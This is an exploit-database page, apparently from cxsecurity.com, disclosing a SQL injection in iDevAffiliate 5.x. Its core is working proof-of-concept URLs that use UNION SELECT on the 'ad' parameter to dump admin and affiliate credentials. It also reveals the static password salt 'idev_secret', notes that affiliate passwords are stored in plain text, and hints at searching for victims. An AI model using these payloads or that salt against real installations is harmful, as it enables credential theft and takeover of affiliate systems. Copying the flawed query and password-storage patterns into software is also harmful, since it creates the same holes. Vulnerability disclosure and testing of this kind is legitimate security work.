iDevAffiliate 5.x SQL Injection

2014.04.23
Credit: Robert Cooper
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: iDevAffiliate <= v5.x SQL Injection Vulnerability # Google Dork: Use your head # Date: 4/21/2014 # Vendor Homepage: http://www.idevdirect.com/ # Version: <= v5.x # Author: Robert Cooper (robert.cooper[at]areyousecure.net) # Tested on: [Linux/Windows] #Vulnerable Parameter: ad= ############################################################## PoC: http://127.0.0.1/idevaffiliate/idevads.php?id=6&ad=2 http://127.0.0.1/idevaffiliate/idevads.php?id=6&ad=-2 UNION ALL SELECT 1,2,3,group_concat(adminid,0x3a,adminpass),5,6 FROM idevaff_admin http://127.0.0.1/idevaffiliate/idevads.php?id=6&ad=-2 UNION ALL SELECT 1,2,3,group_concat(username,0x3a,password),5,6 FROM idevaff_affiliates4 ############################################################## #Notes: The admin passwords are hashed via sha1($salt.$pass) The salt used is "idev_secret" (Without quotes) The affiliate passwords are in plain text For comments/questions or if you'd like your website security audited, email me @ Robert.Cooper[at]areyousecure.net http://www.areyousecure.net


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top